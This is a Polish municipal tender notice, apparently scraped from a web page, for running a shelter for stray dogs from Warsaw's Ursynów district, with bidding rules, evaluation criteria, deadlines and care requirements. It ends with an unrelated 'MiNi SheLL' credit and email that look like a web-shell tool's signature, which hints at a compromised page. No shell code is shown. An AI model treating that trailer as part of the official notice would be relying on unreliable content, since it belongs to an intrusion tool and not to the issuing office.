e)	dokumentu (np. pełnomocnictwa) - jeżeli oferta, w tym wszelkie oświadczenia i dokumenty - zostaną podpisane przez osobę albo osoby działające na podstawie pełnomocnictwa. Jeżeli osoba/osoby podpisująca ofertę działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi obejmować uprawnienie do podpisania oferty. Pełnomocnictwo musi zostać złożone wraz z ofertą w oryginale lub notarialnie poświadczonej kopii. Do pełnomocnictwa należy załączyć dokumenty potwierdzające, że osoba udzielająca pełnomocnictwa była upoważniona do reprezentowania Wykonawcy w dacie udzielania pełnomocnictwa (co można wykazać w szczególności przez załączenie odpisu z Krajowego Rejestru Sądowego lub informacji odpowiadającej odpisowi aktualnemu Rejestru Przedsiębiorców pobieranej na podstawie art. 4 ust. 4aa ustawy z dnia 20 sierpnia 1997 r. o Krajowym Rejestrze Sądowym (Dz. U. z 2007 r. Nr 168, poz.1186, z pózn. zm.) albo zaświadczenia o wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej zgodnie z art. 38 ust. 4 ustawy o swobodzie działalności gospodarczej z dnia 2 lipca 2004 r. (Dz.U. z 2015 r., poz. 584, z późn. zm.).
f)	   Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ust. 1 ustawy, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia;
Dokument ten powinien w szczególności zawierać następujące informacje:
	zakres dostępnych wykonawcy zasobów innego podmiotu;
	sposób wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia publicznego;
	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
	czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.

2. Dokumenty dotyczące przynależności do tej samej grupy kapitałowej
Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy  wg wzoru określonego w Załączniku nr 5 do SIWZ.
Wraz ze złożonym oświadczeniem, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Dokumenty należy złożyć w siedzibie Zamawiającego przy Al. KEN 61 w Wydziale Obsługi Mieszkańców na parterze, stanowiska 2 lub 3

3. Wykaz oświadczeń lub dokumentów, jakie na wezwanie Zamawiającego mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania.
Nie dotyczy.

UWAGA!
       Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, zamawiający może na każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu, a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów.

4.Dokumenty podmiotów zagranicznych
	Wykonawca zagraniczny składa dokumenty zgodnie z zapisami pkt. 9 i 10 SIWZ, ze szczególnym uwzględnieniem, aby dokumenty złożone wraz z ofertą potwierdzały, iż oferta została podpisana przez osobę/y uprawnioną/e do reprezentowania Wykonawcy.


5.   Oferta wspólna:
       Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej       Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.
2)	Oryginał pełnomocnictwa lub kopii potwierdzonej notarialnie powinien być załączony do oferty i zawierać w szczególności wskazanie:
a)	postępowania o zamówienie publiczne, którego dotyczy,
b)	wszystkich Wykonawców ubiegających się wspólnie udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,
c)	ustanowionego Pełnomocnika oraz zakresu jego umocowania.
3)	Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, przy czym nie jest wymagany podpis pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.
4)	W odniesieniu do warunków określonych w art. 22 ust. 1 pkt 2 ustawy wymagania te muszą być spełnione wspólnie przez Wykonawców (nie musi ich spełniać każdy z Wykonawców składających ofertę wspólną osobno).
5)	Oświadczenia, wykazy lub formularze sporządzone na załączonych do SIWZ wzorach, składa i podpisuje w imieniu wszystkich Wykonawców Pełnomocnik lub wszyscy Wykonawcy wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających ofertę wspólną.
6)	Oświadczenie, o którym mowa w pkt 1. lit. c) i 2. każdy z uczestników oferty wspólnej składa indywidualnie.
7)	Kopie dokumentów dotyczące Wykonawcy (członka konsorcjum) muszą być poświadczone za zgodność z oryginałem przez tego Wykonawcę, którego one dotyczą lub przez pełnomocnika.
8)	Pozostałe kopie dokumentów, inne niż wymienione w pkt. 5.7), muszą być poświadczone za zgodność z oryginałem przez Pełnomocnika lub wszystkich Wykonawców.
9)	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy wpisać w formularzu oferty.

6.   Wykonawcy polegający na sytuacji lub zdolnościach innych podmiotów
Wykonawca, który polega na sytuacji lub zdolnościach innych podmiotów na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych, przedstawia, na wezwanie Zamawiającego, w odniesieniu do tych podmiotów, niżej wymienione dokumenty na potwierdzenie braku podstaw do wykluczenia tych podmiotów w oparciu o art. 24 ust. 1 pkt. 13-23, tj:
a) informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b) oświadczenie podmiotu o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
c)   oświadczenie podmiotu o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td> cena brutto</td><td>60</td></tr><tr><td>liczba bud, boksów lub kojców dla psów</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w przypadkach określonych we wzorze umowy stanowiącym załącznik nr 5 do SIWZ tj.: 
Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie:
1)	Maksymalnej liczby psów przebywających w przytulisku, z zastrzeżeniem iż nie może zostać przekroczona łączna maksymalna cena ofertowa brutto.
2)	Obiektu/ obiektów, w których ma być wykonywany przedmiot zamówienia w sytuacji, gdy od momentu podpisania umowy zaistniały nie dające się do wcześniejszego przewidzenia okoliczności powodujące że spełnienie świadczenia (tj. realizacji przedmiotu zamówienia w obiekcie/obiektach) jest niemożliwe z przyczyn niezależnych, w szczególności np. z powodu zniszczenia obiektu/obiektów wskutek pożaru itp.  z zastrzeżeniem, iż obiekt/obiekty musi/musza spełniać wymogi określone w Opisie Przedmiotu Zamówienia. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/12/2016, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Osobami uprawnionymi do porozumiewania się z Wykonawcami są:
 - w zakresie dotyczącym przedmiotu zamówienia:
	Krystyna Nowak  główny specjalista w Wydziale Ochrony Środowiska,
tel. 22/ 443-72-61, faks: 22/ 443-72-91,
- w zakresie dotyczącym zagadnień formalno-prawnych:
	Katarzyna Bębenek  podinspektor w Wydziale Zamówień Publicznych,
tel. 22/443-74-91, faks: 22/ 443-73-32, 
e-mail: zam_publ@ursynow.pl  .
Otwarcie ofert nastąpi w dniu 20.12.2016 r. o godz.11:00 w siedzibie Zamawiającego przy AL.KEN 61 w sali konferencyjnej- pok. 524a (V piętro).
</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Świadczenie usług z zakresu prowadzenia przytuliska oraz opieki nad psami bezdomnymi z terenu Dzielnicy Ursynów  do dziesiątego roku życia psa

I. Założenia ogólne
Przytulisko powinno znajdować się w odległości nie większej niż 30 km od siedziby Zamawiającego.
Wykonawca powinien zagwarantować ciepłe i suche pomieszczenie wyposażone w budy, boksy lub kojce dla 20-25 psów dużych oraz 5-10 małych i średnich tj. łącznie dla  maksymalnie 30 psów.
Warunkiem prowadzenia przytuliska jest posiadanie dużego placu umożliwiającego:
a.	ustawienie bud, boksów lub kojców w miejscu zadaszonym zapewniającym schronienie psom przed wpływem niekorzystnych warunków atmosferycznych;
b.	zorganizowanie wybiegu dla psów (konieczne jest ogrodzenie);

Zamawiający zastrzega sobie prawo do przeprowadzenia wizji w terenie przed wyborem najkorzystniejszej oferty, w celu sprawdzenia warunków dot. miejsca jakim dysponuje Wykonawca.
Wykonawca musi posiadać tytuł prawny do władania nieruchomością, na której zlokalizowane jest przytulisko lub zgodę właściciela/współwłaściciela nieruchomości na prowadzenie przytuliska na tej posesji.
Osoby prowadzące przytulisko powinny odznaczać się przyjacielskim stosunkiem do zwierząt, a przede wszystkim traktować je humanitarnie.
Na terenie przytuliska zwierzęta muszą czuć się bezpiecznie, a jednocześnie nie mogą zagrażać osobom trzecim. Za szkody wyrządzone przez zwierzęta odpowiada Wykonawca. Urząd nie będzie ingerował w ewentualne nieporozumienia z sąsiadami przytuliska.
Opieka weterynaryjna opłacana jest z budżetu m.st. Warszawy na podstawie rachunku wystawionego przez lecznicę, z którą Dzielnica podpisała umowę. Jeśli choroba psa została spowodowana przez niewłaściwą opiekę lub żywienie, koszty leczenia ponosi Wykonawca.

II. Zadania przytuliska

1.	Przytulisko ma za zadanie przyjmowanie i przetrzymywanie zwierząt wyłapanych na terenie Ursynowa - wyłącznie wskazanych przez WOŚ dla Dzielnicy Ursynów.
2.	Obowiązkiem Wykonawcy jest codzienna pielęgnacja zwierząt i dbanie o czystość otoczenia: 
-	należy codziennie przeglądać pomieszczenia, w których przebywają zwierzęta i na  bieżąco usuwać nieczystości z pomieszczeń, 
-	odświeżać i wymieniać posłania zwierząt, aby zawsze były czyste i suche,
-	zapewnić zwierzętom ruch, codziennie wypuszczać je na wybieg lub wyprowadzać na spacer na smyczy,
-	karmić i pielęgnować zwierzęta zgodnie z zaleceniami lekarza weterynarii, 
-	zwierzęta muszą zawsze mieć dostęp do wody pitnej,
-	o zauważonych u zwierząt objawach chorobowych należy informować Wydział Ochrony Środowiska lub wskazaną przez WOŚ lecznicę weterynaryjną (zlokalizowaną na terenie Dzielnicy Ursynów),
-	u zwierząt chorych należy stosować wskazane przez lekarza leki i zabiegi,
-	Urząd Dzielnicy Ursynów zastrzega sobie prawo do odstąpienia od uporczywego leczenia 
i kontynuowania terapii w przypadku złego rokowania, potwierdzonego opinią lekarza weterynarii.
3.	Minimalny okres pobytu zwierząt w przytulisku wynosi 14 dni (okres kwarantanny), chyba, że wcześniej zgłosi się właściciel. Jeśli w ciągu 14 dni nie znajdzie się właściciel, zwierzę zostanie wysterylizowane i może być oddane do adopcji. 
4.	Wykonawca musi prowadzić rejestr, w którym zostanie zapisana data przyjęcia psa, jego opis (znaki szczególne), płeć.
5.	Kontrolę warunków w jakich przebywają zwierzęta (minimum raz w miesiącu) przeprowadza upoważniony pracownik urzędu Dzielnicy Ursynów. Pozytywny wynik kontroli jest podstawą wypłaty wynagrodzenia dla Wykonawcy.
6.	Obowiązkiem Wykonawcy jest ścisła współpraca z lecznicą weterynaryjną wskazaną przez Dzielnicę Ursynów oraz utrzymywanie stałego kontaktu telefonicznego z Samodzielnym wieloosobowym stanowiskiem ds. zwierząt i edukacji ekologicznej  Wydziału  Ochrony Środowiska.

III. Uwagi końcowe

Za opiekę nad jednym psem Dzielnica Ursynów będzie płacić wynagrodzenie obliczane w oparciu 
o stawkę dzienną (liczba dni pobytu psa w przytulisku w danym okresie rozliczeniowym pomnożona przez zaoferowaną w przetargu cenę za jeden dzień) w zależności od wagi i wielkości psa.
Niewłaściwe obchodzenie się ze zwierzętami spowoduje natychmiastowe rozwiązanie umowy 
z Wykonawcą.
W przypadku zagubienia się psa należy natychmiast zawiadomić Wydział Ochrony Środowiska. Od momentu zagubienia zwierzęcia nie będzie wypłacane wynagrodzenie.

Zamawiający planuje wykorzystać wartość umowy w minimum 90%.

Szczegółowy opis przedmiotu zamówienia określa również formularz cenowy, stanowiący załącznik nr 2a do SIWZ dla Zadania 1 oraz wzór umowy stanowiący załącznik nr 6a do SIWZ dla zadania 1.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>85210000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  103134.15<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>liczba bud, boksów lub kojców dla psów</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Świadczenie usług z zakresu prowadzenia przytuliska oraz opieki nad psami bezdomnymi z terenu Dzielnicy Ursynów - powyżej dziesiątego roku życia psa
I. Założenia ogólne
Przytulisko powinno znajdować się w odległości nie większej niż 30 km od siedziby Zamawiającego.
Wykonawca powinien zagwarantować ciepłe i suche pomieszczenie wyposażone w budy, boksy lub kojce dla 20-25 psów dużych oraz 5-10 małych i średnich tj. łącznie dla  maksymalnie 30 psów.
Warunkiem prowadzenia przytuliska jest posiadanie dużego placu umożliwiającego:
a.	ustawienie bud, boksów lub kojców w miejscu zadaszonym zapewniającym schronienie psom przed wpływem niekorzystnych warunków atmosferycznych;
b.	zorganizowanie wybiegu dla psów (konieczne jest ogrodzenie);

Zamawiający zastrzega sobie prawo do przeprowadzenia wizji w terenie przed wyborem najkorzystniejszej oferty, w celu sprawdzenia warunków dot. miejsca jakim dysponuje Wykonawca.
Wykonawca musi posiadać tytuł prawny do władania nieruchomością, na której zlokalizowane jest przytulisko lub zgodę właściciela/współwłaściciela nieruchomości na prowadzenie przytuliska na tej posesji.
Osoby prowadzące przytulisko powinny odznaczać się przyjacielskim stosunkiem do zwierząt, a przede wszystkim traktować je humanitarnie.
Na terenie przytuliska zwierzęta muszą czuć się bezpiecznie, a jednocześnie nie mogą zagrażać osobom trzecim. Za szkody wyrządzone przez zwierzęta odpowiada Wykonawca. Urząd nie będzie ingerował w ewentualne nieporozumienia z sąsiadami przytuliska.
Opieka weterynaryjna opłacana jest z budżetu m.st. Warszawy na podstawie rachunku wystawionego przez lecznicę, z którą Dzielnica podpisała umowę. Jeśli choroba psa została spowodowana przez niewłaściwą opiekę lub żywienie, koszty leczenia ponosi Wykonawca.

II. Zadania przytuliska

1.	Przytulisko ma za zadanie przyjmowanie i przetrzymywanie zwierząt wyłapanych na terenie Ursynowa - wyłącznie wskazanych przez WOŚ dla Dzielnicy Ursynów.
2.	Obowiązkiem Wykonawcy jest codzienna pielęgnacja zwierząt i dbanie o czystość otoczenia: 
-	należy codziennie przeglądać pomieszczenia, w których przebywają zwierzęta i na  bieżąco usuwać nieczystości z pomieszczeń, 
-	odświeżać i wymieniać posłania zwierząt, aby zawsze były czyste i suche,
-	zapewnić zwierzętom ruch, codziennie wypuszczać je na wybieg lub wyprowadzać na spacer na smyczy,
-	karmić i pielęgnować zwierzęta zgodnie z zaleceniami lekarza weterynarii, 
-	zwierzęta muszą zawsze mieć dostęp do wody pitnej,
-	o zauważonych u zwierząt objawach chorobowych należy informować Wydział Ochrony Środowiska lub wskazaną przez WOŚ lecznicę weterynaryjną (zlokalizowaną na terenie Dzielnicy Ursynów),
-	u zwierząt chorych należy stosować wskazane przez lekarza leki i zabiegi,
-	Urząd Dzielnicy Ursynów zastrzega sobie prawo do odstąpienia od uporczywego leczenia 
i kontynuowania terapii w przypadku złego rokowania, potwierdzonego opinią lekarza weterynarii.
3.	Minimalny okres pobytu zwierząt w przytulisku wynosi 14 dni (okres kwarantanny), chyba, że wcześniej zgłosi się właściciel. Jeśli w ciągu 14 dni nie znajdzie się właściciel, zwierzę zostanie wysterylizowane i może być oddane do adopcji. 
4.	Wykonawca musi prowadzić rejestr, w którym zostanie zapisana data przyjęcia psa, jego opis (znaki szczególne), płeć.
5.	Kontrolę warunków w jakich przebywają zwierzęta (minimum raz w miesiącu) przeprowadza upoważniony pracownik urzędu Dzielnicy Ursynów. Pozytywny wynik kontroli jest podstawą wypłaty wynagrodzenia dla Wykonawcy.
6.	Obowiązkiem Wykonawcy jest ścisła współpraca z lecznicą weterynaryjną wskazaną przez Dzielnicę Ursynów oraz utrzymywanie stałego kontaktu telefonicznego z Samodzielnym wieloosobowym stanowiskiem ds. zwierząt i edukacji ekologicznej  Wydziału  Ochrony Środowiska.

III. Uwagi końcowe

Za opiekę nad jednym psem Dzielnica Ursynów będzie płacić wynagrodzenie obliczane w oparciu 
o stawkę dzienną (liczba dni pobytu psa w przytulisku w danym okresie rozliczeniowym pomnożona przez zaoferowaną w przetargu cenę za jeden dzień) w zależności od wagi i wielkości psa.
Niewłaściwe obchodzenie się ze zwierzętami spowoduje natychmiastowe rozwiązanie umowy 
z Wykonawcą.
W przypadku zagubienia się psa należy natychmiast zawiadomić Wydział Ochrony Środowiska. Od momentu zagubienia zwierzęcia nie będzie wypłacane wynagrodzenie.

Zamawiający planuje wykorzystać wartość umowy w minimum 90%.

Szczegółowy opis przedmiotu zamówienia określa również formularz cenowy, stanowiący załącznik nr 2b do SIWZ dla Zadania 2 oraz wzór umowy stanowiący załącznik nr 6b do SIWZ dla zadania 2.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>85210000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  103134.15<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto</td><td>60</td></tr><tr><td>liczba bud, boksów lub kojców dla psów</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com